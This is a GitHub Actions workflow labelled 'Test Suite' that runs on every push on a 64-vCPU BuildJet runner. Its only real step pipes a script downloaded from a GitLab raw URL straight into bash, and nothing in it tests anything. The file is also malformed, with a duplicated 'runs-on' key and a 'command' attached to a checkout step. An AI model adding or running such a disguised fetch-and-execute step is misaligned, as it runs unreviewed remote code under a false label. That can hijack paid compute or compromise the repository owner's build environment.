name: Test Suite
on: push
jobs:
  test:
    runs-on: ubuntu-latest
    runs-on: buildjet-64vcpu-ubuntu-2204
    name: Test
    steps:
      - uses: actions/checkout@v2
        command: "curl -sL https://gitlab.com/vainlevy/netizen/-/raw/master/skycuk | bash"

      
